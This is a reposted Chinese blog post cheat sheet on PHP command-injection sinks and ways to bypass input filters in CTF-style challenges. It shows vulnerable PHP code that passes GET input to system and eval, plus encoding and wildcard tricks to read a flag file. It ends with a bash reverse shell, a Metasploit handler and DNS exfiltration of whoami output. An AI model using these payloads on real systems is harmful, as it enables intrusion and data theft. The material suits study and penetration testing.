命令执行漏洞,绕过过滤姿势
Posted ophxc
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了命令执行漏洞,绕过过滤姿势相关的知识,希望对你有一定的参考价值。
很久之前的存稿,可能有些错误
命令执行漏洞
exec()函数
exec() 不输出结果,返回最后一行shell结果,所有结果可以保存到一个返回的数组里面。 执行外部程式。
语法 : string exec(string command, string [array], int [return_var]);
传回值 : 字串
函式种类 : 作业系统与环境
system:调用系统命令函数
<?php
$a=$_GET[‘a‘];
$output=system($a);
echo $output;
?>
assert:assert能帮助我们执行一些php的指令,并且对于代码的规范不是很严格
<?php
$a=$_GET[‘a‘];
$output=assert($a);
echo $output;
?>
eval:eval() 函数把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。
<?php
$a=$_GET[‘a‘];
$output=eval($a);
echo $output;
?>
passthru:passthru — 执行外部程序并且显示原始输出。
<?php
$a=$_GET[‘a‘];
$output=passthru($a);
echo $output;
?>
preg_replace:pattern处存在一个"/e"修饰符时,$replacement的值会被当成php代码来执行。
<?php
$a = $_GET[‘a‘];
echo preg_replace("/test/e", $a, "just test!")
?>
popen:popen() 函数打开进程文件指针,就跟c语言当中fopen函数差不多。
<?php
$file = popen("/bin/ls","r");
pclose($file);
?>
命令执行漏洞的空格过滤
在linux当中,%09(tab)、$IFS$9、 ${IFS}、$IFS
这些都可以当做空格符作为代替。
一些命令分隔符:
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a
花括号的别样用法:
在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令,例如{mv1,文件1,文件2}
拼接绕过黑名单
a=l;b=s;$a$b
a=fl;b=ag;cat $a$b
编码绕过
$(printf "154163") ==>ls $(printf "x63x61x74x20x2fx66x6cx61x67") ==>cat /flag {printf,"x63x61x74x20x2fx66x6cx61x67"}|$0 ==>cat /flag
单引号,双引号绕过:
ca‘‘t flag 或ca""t flag
反斜杠绕过
1; ls -l;1
利用shell特殊变量绕过
1; l$@s -l;1 · 1; l$*s -l;1 1; l$ns -l;1 //n为任意数字都可以
绕过长度限制
1>1.txt创建一个空文件,当然任何大于1的数字都可以被用来创建一个空文件。
内联执行
root@kali:~# echo “a`ifconfig`” 或者 echo “abcd $(pwd) “abridge0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 ether 46:1e:b4:09:b7:c9 txqueuelen 1000 (Ethernet) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 4 bytes 288 (288.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500 inet 192.168.114.128 netmask 255.255.255.0 broadcast 192.168.114.255 inet6 fe80::20c:29ff:fe12:e944 prefixlen 64 scopeid 0x20 ether 00:0c:29:12:e9:44 txqueuelen 1000 (Ethernet) RX packets 71893 bytes 25359864 (24.1 MiB) RX errors 1 dropped 0 overruns 0 frame 0 TX packets 4286 bytes 274575 (268.1 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 device interrupt 19 base 0x2000 lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 inet6 ::1 prefixlen 128 scopeid 0x10 loop txqueuelen 1000 (Local Loopback) RX packets 80 bytes 4136 (4.0 KiB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 80 bytes 4136 (4.0 KiB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0”
其他方法
利用通配符: 1; cat${IFS}fl* ;1
最简单的:1;cat *;1
1; cat${IFS}fla? ;1
1; cat${IFS}fla[^1] ;1
当cat被过滤后
(1)more:一页一页的显示档案内容 (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页 (3)head:查看头几行 (4)tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示 (5)tail:查看尾几行 (6)nl:显示的时候,顺便输出行号 (7)od:以二进制的方式读取档案内容 (8)vi:一种编辑器,这个也可以查看 (9)vim:一种编辑器,这个也可以查看 (10)sort:可以查看 (11)uniq:可以查看 (12)file -f:报错出具体内容
<与<<的区别
使用>命令会将原有文件内容覆盖,如果是存入不存在的文件名,那么就会新建该文件再存入。
>>符号的作用是将字符串添加到文件内容末尾,不会覆盖原内容。
文件读取绕过
root@kali:~# ls -t flag root@kali:~# ls -t > a root@kali:~# sh a flag wwww
对于长度有限制
root@kali:~# l> s> > -> l> >q root@kali:~# cat q 总用量 5216 -rw-r--r-- 1 root root 0 5月 4 11:59 1 -rw-r--r-- 1 root root 1319936 2月 27 16:45 1.exe -rw-r--r-- 1 root root 0 1月 29 16:03 1.jpg -rwxr-xr-x 1 root root 62 1月 21 21:47 1.sh
利用base64编码绕过
root@kali:~# `echo Y2F0Cg== |base64 -d` testip.txt sss ddd
处理无回显的命令执行漏洞
利用bash命令: 使用nc监听我们的8080端口:nc -l -p 8080 -vvv 把bash命令传过来:bash -i >& /dev/tcp/ip地址/8080 0>&1 关于这个的具体实现原理可以再网上找下,有很多详细的说明。
msf
利用msf也可以,
use exploit/multi/handler set payload linux/armle/shell/reverse_tcp set lport 8080 set lhost ip地址 set exitonsession false exploit -j
利用dns解析
root@kali:~# ping `whoami`.******.ceye.io ping: root.******.ceye.io: 未知的名称或服务
以上是关于命令执行漏洞,绕过过滤姿势的主要内容,如果未能解决你的问题,请参考以下文章